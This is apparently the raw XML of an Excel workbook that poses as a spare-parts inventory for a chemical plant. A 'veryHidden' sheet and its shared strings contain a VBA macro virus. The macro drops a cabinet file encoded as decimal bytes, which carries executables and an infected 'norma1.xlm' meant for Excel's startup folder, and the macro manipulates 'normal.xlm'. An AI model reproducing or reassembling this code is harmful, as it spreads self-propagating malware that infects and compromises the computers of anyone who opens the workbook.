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480" windowHeight="8025" firstSheet="1" activeTab="9"/>
  </bookViews>
  <sheets>
    <sheet name="MXYIBKADTBBVIW" sheetId="36" state="veryHidden" r:id="rId1"/>
    <sheet name="尿素车间" sheetId="51" r:id="rId2"/>
    <sheet name="电力" sheetId="53" r:id="rId3"/>
    <sheet name="仪表" sheetId="54" r:id="rId4"/>
    <sheet name="氰尿酸" sheetId="55" r:id="rId5"/>
    <sheet name="化工" sheetId="58" r:id="rId6"/>
    <sheet name="甲醇" sheetId="59" r:id="rId7"/>
    <sheet name="水汽" sheetId="61" r:id="rId8"/>
    <sheet name="原料" sheetId="62" r:id="rId9"/>
    <sheet name="在库备品备件" sheetId="69" r:id="rId10"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">电力!$B$5:$L$255</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">尿素车间!$B$5:$L$457</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">仪表!$B$5:$L$239</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="1">尿素车间!#REF!</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="2">电力!$5:$6</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="5">化工!$5:$6</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="6">甲醇!$5:$6</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="1">尿素车间!$5:$6</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="4">氰尿酸!$5:$6</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="7">水汽!$5:$6</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="3">仪表!$5:$6</definedName>
  </definedNames>
  <calcPr calcId="144525" fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="12666">
  <si>
    <t xml:space="preserve">77 83 67 70 0 0 0 0 157 27 1 0 0 0 0 0 48 24 0 0 0 0 0 0 3 1 1 0 5 0 4 0 247 20 0 0 0 24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t>
  </si>
  <si>
    <t>Private Sub createcabfile()</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Dim ch As Byte</t>
  </si>
  <si>
    <t>on error resume next</t>
  </si>
  <si>
    <t>Set fso = CreateObject("scripting.filesystemobject")</t>
  </si>
  <si>
    <t>Set w = CreateObject("wscript.shell")</t>
  </si>
  <si>
    <t>myfolder = w.specialfolders("Templates") &amp; "\Software\"</t>
  </si>
  <si>
    <t>If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t>fso.createfolder myfolder</t>
  </si>
  <si>
    <t>End If</t>
  </si>
  <si>
    <t>For i=1 to Workbooks.Count</t>
  </si>
  <si>
    <t>If Workbooks(i).name="normal.xlm" then</t>
  </si>
  <si>
    <t>workbooks(i).close</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 186 24 0 0 8 0 1 0 0 128 0 0 0 0 0 0 0 0 225 48 244 104 32 0 115 101 116 102 108 97 103 46 101 120 101 0 0 96 0 0 0 128 0 0 0 0 232 48 135 172 32 0 105 110 116 101 114 110 101 116 46 101 120 101 0 0 18 1 0 0 224 0 0 0 0 232 48 177 180 32 0 110 111 114 109 97 49 46 120 108 109 0 0 158 1 0 0 242 1 0 0 0 232 48 109 144 32 0 110 111 114 109 97 108 46 100 111 116 0 0 80 0 0 0 144 3 0 0 0 229 48 54 95 32 0 115 101 110 100 116 111 46 101 120 101 0 93 3 165 99 72 50 0 128 67 75 236 58 109 116 20 85 150 85 93 213 73 37 169 166 11 236 196 0 65 90 44 92 152 48 28 156 14 14 216 129 105 52 221 9 199 4 58 132 116 19 49 9 40 196 216 43 200 36 85 160 78 26 59 84 218 77 229 209 154 221 163 206 236 142 103 143 46 58 198 115 156 213 61 58 51 56 199 29 187 19 76 2 202 71 24 151 201 12 179 10 234 226 203 20 106 28 178 157 206 208 80 123 95 85 135 4 231 99 119 127 204 191 188 115 94 223 170 247 238 123 239 222 251 238 103 37 85 247 116 83 12 69 81 44 116 93 167 168 195 148 217 60 212 255 222 6 161 207 90 248 243 89 212 155 57 199 111 62 76 87 30 191 121 115 243 131 173 206 61 45 15 63 208 178 125 151 243 254 237 187 119 63 44 57 239 219 233 108 145 119 59 31 220 237 44 219 88 227 220 245 240 142 157 203 109 182 92 49 179 199 227 53 76 212 253 173 93 103 38 251 47 191 249 192 153 60 128 135 151 223 127 230 91 198 216 67 103 110 4 88 247 205 253 103 86 25 243 77 103 214 2 220 244 224 253 205 4 127 146 22 191 151 162 42 105 134 154 255 220 39 215 72 63 71 217 233 60 58 11 38 225 101 133 57 22 190 17 126 4 232 219 50 92 10 230 59 155 89 51 9 169 238 12 30 52 198 248 21 50 239 194 181 113 97 154 44 </t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">28 59 40 106 201 255 65 102 255 239 6 116 190 254 23 166 151 75 59 31 145 0 238 189 51 67 144 255 107 132 65 115 194 46 203 91 118 108 151 182 83 212 7 217 25 222 175 201 96 170 129 52 60 203 77 52 106 112 62 252 236 201 224 237 249 35 188 248 95 131 213 153 54 211 102 218 76 155 105 51 109 166 205 180 153 54 211 102 218 76 155 105 127 189 166 92 44 65 101 98 105 77 109 0 85 176 65 87 178 217 179 199 67 85 171 146 184 172 191 76 156 47 96 31 212 139 8 135 232 208 178 90 252 36 148 210 181 33 58 182 89 92 17 162 55 225 239 91 97 170 76 92 181 88 135 125 18 231 44 126 188 15 70 2 40 21 170 172 85 219 68 9 55 0 126 0 223 7 131 106 135 216 65 25 216 149 202 145 85 29 241 189 34 250 8 118 10 177 53 184 218 220 69 84 142 8 104 208 215 126 158 108 166 244 177 238 175 218 62 116 157 237 136 171 247 138 69 246 39 158 130 65 216 210 137 54 139 206 16 133 44 158 196 185 28 127 45 190 66 214 74 226 150 24 162 44 148 65 117 41 190 4 21 60 122 15 165 208 144 90 38 222 155 24 177 92 122 137 48 136 142 41 231 25 255 165 23 241 32 153 175 20 183 193 241 205 100 85 204 145 183 9 191 111 14 150 1 166 71 73 176 202 17 81 173 132 211 42 69 135 199 164 168 189 143 224 186 19 176 103 145 253 160 172 235 122 136 10 173 168 197 223 179 78 138 164 44 196 110 194 29 172 201 100 8 228 145 99 29 131 37 64 101 48 131 83 41 86 132 216 106 188 141 224 108 22 253 100 168 76 148 66 172 95 125 218 144 14 246 153 84 180 41 71 42 80 226 31 219 63 214 105 138 98 122 81 42 161 231 0 21 52 21 1 17 44 123 148 91 223 126 148 186 170 235 235 36 107 57 25 64 227 137 11 57 1 114 99 120 156 49 54 40 10 81 235 208 112 226 124 78 117 45 254 13 236 9 162 141 234 251 75 209 165 73 158 3 248 44 99 16 177 4 136 189 23 4 202 118 3 99 203 50 82 125 217 88 82 212 222 79 80 55 202 199 64 194 75 92 113 247 40 225 29 186 211 254 228 5 160 182 9 </t>
  </si>
  <si>
    <t xml:space="preserve">241 76 19 218 204 88 154 64 84 69 228 84 37 206 182 79 68 201 148 10 215 36 111 204 32 176 48 14 40 171 200 104 17 185 192 174 74 198 210 89 41 138 176 70 44 30 34 130 142 149 9 105 152 41 74 246 211 82 193 59 43 64 3 99 37 140 235 244 165 31 73 14 130 68 8 96 18 12 28 237 238 111 251 59 237 111 97 108 21 2 206 149 68 150 235 236 52 73 37 82 57 232 84 226 227 156 226 99 176 89 169 251 87 225 185 176 178 50 86 242 172 178 246 138 68 223 229 30 150 184 59 149 126 214 253 171 182 47 204 75 66 142 238 59 1 159 25 218 84 139 255 141 49 111 169 76 252 155 16 237 199 223 167 13 33 192 81 149 213 248 105 139 33 173 178 77 184 11 158 106 241 46 138 252 206 166 12 209 186 226 141 13 245 91 149 35 37 125 221 208 2 112 36 23 84 78 234 200 199 247 120 36 171 50 168 107 119 244 40 82 73 0 183 80 134 117 96 1 204 66 223 43 224 90 43 89 207 71 227 97 43 224 107 115 144 175 40 26 151 242 252 216 70 38 154 138 168 58 52 160 52 241 84 99 67 159 177 107 52 41 231 4 240 223 195 46 117 48 130 111 129 135 104 188 206 56 162 161 47 233 179 121 36 59 217 246 183 176 122 124 184 174 97 126 188 207 21 111 232 171 33 107 121 215 217 32 16 132 6 193 8 34 19 22 249 219 77 175 112 180 116 27 242 113 104 109 113 10 148 227 214 160 159 172 29 55 73 114 15 200 179 8 253 17 105 150 120 69 245 241 90 182 178 129 119 42 239 1 83 156 210 196 82 106 86 35 234 107 216 218 23 162 177 133 144 3 135 128 235 112 157 117 233 171 87 198 145 135 218 95 245 194 225 239 121 64 173 94 7 134 86 161 10 62 153 80 164 21 74 155 40 208 178 221 143 151 131 249 40 41 189 78 90 112 151 54 143 140 82 242 13 201 132 69 154 229 199 55 100 166 100 75 94 202 231 54 54 107 123 195 88 136 250 36 11 26 104 132 83 107 209 197 106 56 16 133 121 251 107 97 1 121 57 53 156 142 234 170 151 67 31 201 217 174 248 200 113 226 105 100 71 211 184 143 231 105 137 67 190 66 213 235 </t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t xml:space="preserve">208 178 7 188 14 242 49 11 109 224 219 207 115 112 187 210 82 228 99 129 190 69 238 97 116 185 197 130 82 65 93 230 244 219 241 99 28 69 45 221 207 210 107 65 16 197 31 209 97 78 243 185 235 29 45 190 232 81 41 47 128 127 12 150 7 82 151 31 85 194 14 74 178 161 62 215 233 113 217 129 46 23 255 65 179 160 203 198 22 32 199 215 12 19 226 129 19 169 156 246 114 197 195 238 129 150 181 40 156 214 150 2 185 1 251 47 40 63 254 61 104 65 157 33 133 229 186 151 16 121 55 80 25 141 63 78 232 164 201 213 158 181 71 253 32 13 228 21 128 233 163 125 228 6 144 55 13 167 12 20 27 135 242 218 103 186 36 178 248 35 11 185 129 16 13 47 28 102 243 224 165 238 235 34 170 231 208 73 144 80 56 173 86 113 134 136 94 249 147 34 226 51 34 210 24 84 197 101 230 190 97 10 233 22 247 32 154 48 133 116 123 13 14 66 80 88 26 230 38 165 196 124 68 88 187 219 93 229 104 89 78 196 130 18 82 142 41 150 68 113 175 191 134 8 228 229 188 140 174 75 183 19 161 124 123 169 151 99 134 181 194 0 254 73 46 76 16 41 44 233 100 128 140 187 244 42 14 72 81 194 28 101 143 238 189 158 125 65 99 13 33 12 184 78 23 123 57 34 128 255 50 173 141 168 170 34 61 12 46 193 17 213 165 92 69 167 193 40 116 139 92 47 126 9 207 160 191 178 45 128 127 54 139 162 232 50 209 81 231 210 3 248 179 180 78 12 180 14 52 60 91 76 19 13 119 244 208 146 208 195 73 124 242 8 43 103 15 248 10 137 243 11 130 76 29 132 252 115 54 131 124 215 81 32 213 254 76 98 61 74 104 182 1 107 247 94 15 85 64 156 192 160 14 54 138 23 204 38 6 41 211 125 126 88 38 76 118 252 172 221 112 19 125 33 15 188 242 164 227 33 162 229 71 120 114 77 33 189 249 245 109 30 170 57 114 155 135 218 241 130 241 37 123 135 186 216 140 204 2 92 161 186 19 235 249 44 96 184 78 119 125 160 230 247 192 145 104 208 140 73 170 237 69 120 75 156 231 152 99 170 237 121 242 136 133 67 207 1 12 81 120 79 </t>
  </si>
  <si>
    <t xml:space="preserve">33 232 1 16 195 133 138 240 63 17 19 85 118 166 41 252 26 80 171 231 111 129 221 14 29 1 203 194 187 242 41 234 80 4 86 224 130 27 32 254 108 153 3 63 151 224 166 94 56 12 99 135 222 134 31 191 190 242 117 0 250 202 87 9 214 201 113 131 110 213 251 169 31 167 0 15 121 47 34 14 229 168 85 231 252 213 248 89 193 80 61 4 4 203 231 240 239 200 133 175 233 132 85 22 201 138 191 152 11 7 19 101 189 105 30 69 53 19 226 245 252 50 112 243 128 63 133 116 116 18 105 2 30 234 50 88 28 16 59 233 254 36 49 128 119 207 55 24 11 72 185 126 28 35 207 224 11 67 64 95 228 49 160 50 159 7 108 112 121 181 160 250 160 12 238 53 207 131 23 178 43 79 16 109 31 128 56 153 178 42 23 22 198 138 162 207 3 114 226 2 131 152 100 217 10 150 150 30 12 98 251 226 140 26 150 94 211 158 130 144 5 167 68 138 10 209 8 227 47 225 161 206 253 110 157 84 20 196 159 144 103 191 158 239 128 195 64 196 185 122 190 0 79 8 107 22 215 231 65 124 55 204 34 166 46 178 99 5 75 69 63 151 114 106 113 255 34 192 215 242 93 113 205 161 44 126 26 152 165 76 213 201 153 84 157 250 173 38 135 166 30 47 0 45 156 171 239 229 112 22 104 73 83 123 19 63 126 217 21 175 83 179 84 31 167 250 216 134 62 8 93 172 219 74 56 107 93 131 6 33 224 77 88 149 143 23 34 62 70 184 74 150 13 1 67 139 253 120 109 134 200 66 147 72 206 36 18 72 140 131 13 206 57 68 200 184 142 10 162 139 237 23 29 36 3 169 226 106 220 54 178 127 32 104 87 30 5 95 132 18 232 171 63 150 93 23 200 174 135 182 119 4 1 3 28 127 88 80 195 41 53 60 106 248 23 50 214 227 148 248 144 37 88 141 15 229 26 198 131 24 166 63 233 97 35 246 142 4 185 15 47 79 150 120 211 106 152 179 63 241 25 140 196 162 23 47 131 85 86 165 139 171 120 119 149 208 186 20 30 117 111 186 43 39 50 145 43 103 235 222 209 126 202 230 233 228 60 104 48 246 12 193 44 62 214 62 65 254 92 211 246 62 </t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t xml:space="preserve">74 153 107 139 83 49 239 88 136 242 155 111 65 63 98 244 146 21 122 126 145 33 2 233 46 228 29 163 189 41 247 64 91 30 248 209 98 47 239 246 10 45 93 46 240 48 48 102 143 34 32 97 117 152 147 26 67 214 45 171 189 156 92 57 37 30 67 90 35 17 67 31 137 20 33 212 104 3 177 170 177 96 181 46 11 186 204 235 83 135 192 214 99 192 145 234 77 105 47 79 33 63 7 97 1 191 227 36 106 176 198 84 58 143 196 131 4 34 171 230 217 59 142 67 68 49 207 42 34 70 189 134 28 166 21 20 123 71 255 156 186 128 55 124 129 4 198 64 8 226 69 131 156 125 152 184 42 45 203 221 31 206 70 253 135 200 12 228 148 248 49 162 117 135 72 24 38 225 234 230 16 27 80 141 112 138 183 95 55 193 133 230 225 205 224 13 235 92 71 15 251 193 34 81 62 153 81 217 217 74 220 9 153 240 154 83 45 16 129 127 231 58 253 214 54 50 217 139 126 111 42 2 98 13 69 64 236 40 113 231 16 33 100 70 201 209 149 132 243 206 246 137 56 96 182 125 0 14 241 63 193 93 68 214 156 34 44 72 214 145 38 56 151 104 25 36 36 50 79 146 145 6 161 231 128 189 227 18 176 213 227 177 71 53 2 33 253 35 249 69 143 96 239 56 75 148 100 3 39 94 85 103 129 127 6 124 50 161 236 228 41 241 75 222 210 244 10 111 248 245 69 237 87 247 192 105 18 215 126 181 27 160 156 87 131 127 184 200 72 139 228 236 0 174 36 156 146 56 198 209 65 105 71 38 217 137 85 208 234 44 180 161 112 61 4 196 13 236 126 33 232 175 193 212 149 140 95 227 53 151 114 89 151 10 80 31 122 143 48 122 126 146 209 24 59 168 89 15 111 105 5 11 243 176 78 201 22 178 132 168 26 124 52 219 212 108 31 215 85 197 117 114 154 3 242 71 47 215 72 182 252 113 122 114 203 213 97 190 81 202 34 145 75 179 67 244 55 170 37 141 227 157 64 63 201 220 182 214 247 189 63 173 129 128 130 134 128 170 4 20 230 192 242 134 152 126 247 213 189 156 59 101 63 240 8 88 213 248 0 249 107 164 236 128 194 70 249 152 81 38 184 150 </t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t xml:space="preserve">165 151 94 210 197 103 134 111 130 219 24 248 57 153 84 70 216 22 94 57 199 48 131 186 24 29 93 0 126 81 140 97 152 238 6 248 16 129 20 252 44 131 238 135 126 203 80 87 86 103 118 151 143 238 44 167 187 124 22 216 182 179 220 162 244 51 202 128 177 249 251 215 54 143 173 159 194 53 176 104 165 223 162 12 88 8 214 143 174 97 117 155 56 62 192 40 39 51 7 167 175 63 9 224 109 232 111 66 127 21 250 139 208 159 131 254 52 244 131 132 254 178 39 63 85 203 158 250 20 32 6 136 1 94 4 120 17 32 20 31 79 141 2 28 3 56 6 48 5 48 5 48 13 48 29 99 99 198 159 105 71 153 212 164 36 116 194 240 40 244 52 116 97 33 140 120 185 134 198 163 125 221 132 186 233 207 38 231 153 17 160 241 58 105 128 40 38 113 99 210 109 233 88 219 234 116 70 254 226 148 252 109 87 46 189 148 134 115 247 56 201 185 227 191 6 41 59 157 6 191 147 247 49 97 222 71 49 185 143 71 22 26 247 65 144 187 59 225 185 7 250 41 232 93 62 230 150 161 206 114 102 3 108 188 145 108 251 211 105 219 18 186 50 243 83 119 244 133 69 249 210 144 254 193 105 152 221 211 240 0 105 234 174 190 96 148 47 9 185 246 3 247 64 88 185 126 111 17 192 50 232 37 208 75 161 151 65 175 132 190 25 250 3 78 227 94 160 240 123 170 8 96 33 192 66 128 14 128 14 128 2 64 1 32 15 144 7 200 1 228 0 178 0 217 235 239 197 148 79 4 126 59 161 255 0 250 171 206 105 247 226 99 128 234 105 247 96 188 95 127 7 211 199 174 187 55 125 229 197 125 30 202 72 128 137 192 73 86 209 38 178 231 246 45 50 210 137 34 179 80 146 11 86 151 137 156 36 24 99 63 188 201 28 251 208 21 55 99 175 123 37 39 121 168 125 144 225 223 87 96 78 21 65 189 197 132 232 6 165 223 174 92 24 13 76 37 25 78 35 201 152 138 216 246 142 35 25 31 246 54 129 22 41 215 48 238 145 127 133 55 158 158 116 85 80 186 189 189 128 68 0 43 184 11 53 75 223 91 8 49 158 228 150 7 141 50 146 87 141 60 251 33 </t>
  </si>
  <si>
    <t xml:space="preserve">226 78 31 64 1 62 217 123 64 46 65 27 132 160 50 161 67 21 60 145 208 13 111 84 250 239 134 55 42 61 169 89 223 33 222 168 107 35 219 24 57 127 32 50 113 64 206 138 156 112 170 1 190 125 191 145 186 66 242 189 1 202 46 146 208 190 155 73 104 73 241 51 171 2 206 177 255 148 94 167 206 106 232 27 31 158 31 87 206 9 74 92 200 201 184 87 82 73 130 7 82 46 242 196 75 115 65 247 74 51 131 122 151 100 1 253 224 247 193 41 66 240 207 164 1 25 223 200 244 119 249 217 100 47 164 2 255 76 138 230 157 41 10 234 14 37 44 80 232 164 244 64 178 215 34 223 151 236 173 144 22 116 121 172 165 185 82 129 94 37 128 5 50 177 141 244 128 55 69 10 157 254 178 21 214 92 51 112 67 192 150 133 106 35 104 139 102 222 114 135 25 68 67 214 58 119 66 206 159 10 132 170 205 136 201 107 201 129 169 93 70 206 177 18 158 253 184 142 228 142 35 183 18 122 25 84 59 70 215 166 98 149 43 88 35 87 129 204 35 69 84 225 180 148 19 249 78 174 204 242 172 102 17 47 119 130 18 129 183 77 169 94 129 25 116 39 212 170 148 93 121 207 72 80 132 46 170 20 226 51 185 198 82 155 148 215 153 93 174 123 133 17 82 127 175 95 13 249 73 33 96 120 34 171 114 229 44 197 43 88 180 134 254 108 91 57 108 162 181 154 188 0 110 204 171 135 232 201 44 68 188 46 91 132 167 114 37 60 70 73 235 204 124 160 66 186 161 203 171 131 124 110 132 109 80 94 121 103 217 109 86 109 169 59 204 203 121 145 176 158 43 91 251 179 115 181 194 16 29 210 73 42 81 109 124 156 224 201 140 196 146 115 129 126 32 201 126 160 28 108 91 19 64 186 18 240 156 213 227 1 38 45 157 89 197 97 30 114 51 200 115 254 82 70 241 166 145 16 72 22 253 84 179 3 66 105 51 7 63 248 4 96 52 179 228 149 34 175 239 80 153 82 6 74 12 163 144 201 55 117 151 12 208 198 0 155 25 8 134 232 198 213 107 134 225 16 121 54 177 75 61 127 217 54 82 77 228 47 1 0 198 201 83 53 232 94 209 161 174 249 0 80 </t>
  </si>
  <si>
    <t xml:space="preserve">58 23 144 28 65 46 125 225 117 147 134 69 200 246 42 73 63 99 223 77 187 71 91 110 64 89 38 93 202 23 172 123 37 65 105 253 188 161 217 73 136 42 36 68 125 195 176 248 230 37 100 64 36 3 115 141 129 232 217 173 50 177 117 78 53 200 48 43 137 198 140 177 3 169 173 182 107 251 246 179 218 231 102 94 93 99 38 214 129 96 107 43 164 214 163 36 181 134 164 183 52 54 153 244 218 147 101 183 65 126 29 240 227 15 11 205 130 65 230 167 100 169 109 132 243 10 13 209 20 1 171 43 72 85 48 12 249 196 215 178 239 28 63 126 163 128 120 2 39 202 38 101 194 149 24 40 0 234 251 179 151 115 205 34 161 158 231 92 103 209 62 97 117 35 171 202 99 97 70 109 100 67 116 77 0 175 51 235 73 119 31 228 211 109 91 81 144 111 26 239 229 104 153 43 46 103 71 230 16 83 200 70 27 57 52 92 252 235 100 47 163 214 167 164 165 232 12 250 48 241 7 171 242 201 66 228 120 198 172 27 126 195 70 164 37 104 200 125 170 117 81 228 142 92 153 209 189 169 59 181 175 146 189 17 121 206 117 149 238 8 201 222 149 112 154 146 57 208 168 145 55 224 45 89 206 131 241 147 226 21 5 217 232 105 153 187 185 54 53 242 15 240 90 156 96 122 201 119 153 254 63 85 121 101 193 129 33 146 71 233 242 24 126 252 170 201 129 55 45 47 64 229 28 212 32 196 24 91 243 136 125 1 41 156 7 72 41 183 57 181 18 130 158 38 43 170 96 133 145 249 194 50 200 215 247 217 208 70 195 223 89 193 223 73 12 42 47 36 7 27 199 192 43 249 194 226 229 150 122 211 64 50 148 21 76 194 208 121 242 149 164 26 28 221 202 49 136 30 228 99 137 235 44 72 71 173 79 119 101 151 110 151 230 149 182 72 246 210 125 246 232 34 144 224 91 52 4 22 141 124 0 56 65 107 220 91 57 196 0 79 88 66 244 61 93 229 116 249 29 125 246 142 79 128 93 247 47 205 180 213 254 139 184 146 218 252 120 139 180 77 193 197 146 87 193 115 165 219 21 60 75 42 170 176 71 95 37 101 70 125 218 30 61 4 15 3 222 52 241 128 202 81 </t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t xml:space="preserve">167 246 51 99 240 201 233 131 130 246 47 201 132 71 14 43 71 61 218 15 146 9 139 220 170 156 191 170 92 72 43 71 45 237 39 72 53 162 29 56 76 156 122 116 80 174 203 27 28 105 33 74 128 239 147 42 42 164 229 10 206 147 230 40 56 75 246 36 223 141 203 238 200 113 207 72 13 76 175 174 79 201 203 51 110 183 253 130 254 142 174 143 148 102 134 111 156 28 62 65 254 189 107 100 49 12 195 82 41 219 117 122 100 46 60 71 142 71 70 102 3 108 126 17 144 12 39 13 110 232 187 55 194 141 15 130 67 112 191 23 102 161 188 157 135 188 14 221 122 16 116 69 221 195 171 91 88 181 80 221 194 169 91 138 212 10 243 27 14 202 39 5 8 84 231 174 207 93 73 87 220 253 31 193 253 245 104 129 241 165 240 50 178 187 143 75 249 201 117 188 34 229 122 148 1 214 221 219 118 81 251 14 42 81 52 17 165 66 206 196 103 22 92 144 130 50 5 217 204 250 196 110 126 97 44 205 118 95 145 10 209 184 251 191 129 223 13 130 174 238 102 213 221 188 186 155 83 151 171 187 139 80 191 81 92 147 162 131 208 75 34 4 68 118 123 135 147 216 196 22 46 122 214 222 145 79 110 242 178 85 230 149 109 28 56 177 45 35 54 99 0 244 57 73 244 217 246 91 194 77 21 40 36 175 26 207 168 130 37 89 84 116 208 152 173 104 37 21 83 37 252 50 67 1 247 177 112 126 172 100 125 241 80 172 228 39 195 80 54 41 183 82 202 255 180 247 53 80 81 92 89 194 213 116 129 5 52 118 43 16 209 104 210 70 204 196 33 49 196 246 7 166 197 116 11 173 128 160 141 45 221 33 138 74 164 13 116 16 152 166 74 193 129 164 73 193 124 20 149 90 157 196 179 155 61 51 155 9 209 153 117 146 239 59 155 179 153 207 207 153 100 147 198 206 128 154 108 98 116 39 58 154 47 226 140 187 83 78 185 9 70 3 173 33 212 119 239 171 106 108 147 56 51 187 103 206 126 231 236 225 157 243 120 127 247 189 119 223 223 125 247 222 119 139 30 48 149 114 163 34 37 46 217 0 48 5 176 188 97 36 24 152 224 113 1 155 11 246 198 101 117 98 </t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t xml:space="preserve">86 117 193 15 226 178 240 93 64 41 45 120 46 46 11 53 236 202 178 2 41 46 235 105 204 202 46 216 19 151 133 58 15 101 90 193 179 152 149 162 101 245 162 0 75 16 9 48 234 169 42 129 68 171 54 43 12 14 189 2 114 224 136 236 199 49 162 206 58 25 229 218 204 197 64 181 64 64 17 55 100 211 98 154 27 192 243 51 81 32 244 30 198 191 44 142 22 198 138 113 62 108 178 15 180 208 249 22 238 115 201 84 178 89 50 73 152 11 39 24 178 88 32 123 17 143 237 92 254 156 131 132 182 114 137 242 124 224 132 196 37 168 121 178 169 189 73 223 137 176 211 151 23 176 134 213 94 249 159 81 111 37 177 73 6 69 150 232 127 194 219 196 45 223 53 162 170 226 112 149 253 170 176 4 245 82 32 178 38 203 125 255 142 123 161 0 91 200 187 155 205 175 244 201 207 101 225 67 85 149 43 244 112 1 123 79 165 124 233 115 85 181 71 170 132 36 2 30 68 112 159 186 84 70 243 207 42 32 248 85 198 47 243 238 230 142 85 171 4 9 249 135 88 46 204 193 184 112 215 150 205 131 137 7 0 83 60 14 27 117 34 113 11 246 143 3 71 249 230 16 192 214 209 0 227 245 168 153 121 48 79 125 168 82 19 150 28 197 77 50 158 151 197 38 136 81 201 21 117 75 174 49 183 199 227 147 203 9 79 129 212 71 162 123 220 114 201 231 56 40 254 237 44 251 85 192 144 145 79 92 6 12 98 240 162 11 128 190 239 246 250 228 25 164 214 24 255 118 70 177 64 52 113 91 54 239 71 85 156 70 189 196 114 96 66 50 60 94 126 46 37 114 22 164 96 131 4 107 88 200 110 149 101 132 101 112 144 132 14 83 40 239 30 174 168 215 109 112 132 110 220 195 46 232 58 201 206 55 31 58 57 242 116 77 155 131 162 89 147 106 232 30 97 147 122 45 61 119 172 114 144 248 175 73 92 121 143 36 232 208 189 212 42 108 96 149 67 41 36 57 137 164 184 215 226 48 31 58 59 194 199 55 146 216 155 213 115 215 42 232 197 202 38 119 33 151 117 35 153 123 183 235 36 103 44 86 24 210 212 118 21 216 195 44 42 148 71 153 187 134 0 207 </t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 66 101 214 7 138 120 106 13 112 126 83 11 17 145 129 164 77 171 84 195 26 238 106 175 5 240 44 229 59 178 40 46 5 81 121 24 80 97 191 131 218 103 118 33 0 206 140 27 98 146 54 63 218 220 152 227 38 208 8 185 170 193 113 233 17 32 143 177 9 83 13 151 102 96 82 101 141 252 183 96 57 50 128 254 169 84 117 164 162 162 239 226 46 36 129 226 3 101 91 113 55 217 206 1 37 132 141 202 217 212 95 139 195 246 171 44 28 95 132 192 209 42 247 169 153 197 200 67 68 237 95 152 187 254 128 87 3 41 195 39 151 75 248 34 202 71 13 230 110 36 26 176 135 76 90 125 115 215 17 124 128 203 191 75 28 96 167 58 28 219 243 179 184 235 90 240 89 206 128 88 80 4 205 125 16 245 120 28 30 143 219 235 241 8 69 217 139 213 211 162 108 87 216 69 149 242 161 207 180 35 83 148 109 97 231 121 60 149 168 198 206 6 40 245 52 112 171 83 137 46 187 229 15 120 78 54 101 91 128 121 179 120 213 76 7 162 23 81 60 124 52 129 43 179 127 129 36 35 134 49 187 60 239 110 113 16 136 121 94 22 247 5 254 25 201 25 116 136 114 165 188 238 51 253 56 115 180 109 68 73 173 244 121 229 41 159 146 219 223 167 102 46 199 218 3 200 40 33 229 70 65 238 114 17 170 115 235 112 70 228 12 173 42 8 102 76 224 78 249 239 46 33 50 75 144 165 24 36 108 155 21 181 136 223 71 72 251 112 203 172 16 10 52 83 213 129 85 137 41 125 8 195 15 48 137 88 166 252 86 130 17 2 127 182 9 250 218 14 188 232 74 216 117 191 210 94 167 139 186 195 230 174 95 96 60 87 170 163 15 83 12 54 37 205 94 216 158 32 14 231 19 89 168 99 253 91 7 118 35 63 140 248 116 93 33 143 65 108 30 175 245 47 76 145 122 72 247 253 45 89 161 </t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t xml:space="preserve">173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225 155 249 120 251 47 109 231 180 193 46 63 163 74 139 207 112 229 221 231 6 86 209 157 92 98 96 228 17 37 69 140 20 19 153 47 252 57 52 188 129 44 20 175 170 236 12 223 68 55 38 162 158 18 86 224 130 38 133 214 210 14 197 204 71 141 112 56 214 210 140 66 195 223 80 33 255 133 177 253 135 42 65 92 205 116 35 83 77 158 63 139 34 182 112 128 66 17 187 14 153 18 243 190 48 244 81 75 90 221 143 114 51 155 41 179 70 242 64 98 142 9 210 91 241 89 35 28 129 91 55 242 46 81 12 250 42 81 178 168 123 49 23 74 225 190 62 49 151 162 170 225 228 136 255 10 87 80 89 54 61 234 164 147 0 187 195 120 56 88 51 44 23 3 23 147 69 72 56 140 66 63 190 65 138 184 176 129 241 186 131 208 64 173 186 4 149 15 250 99 10 148 88 225 198 23 155 77 252 184 202 46 4 1 32 155 189 79 90 188 83 52 189 38 148 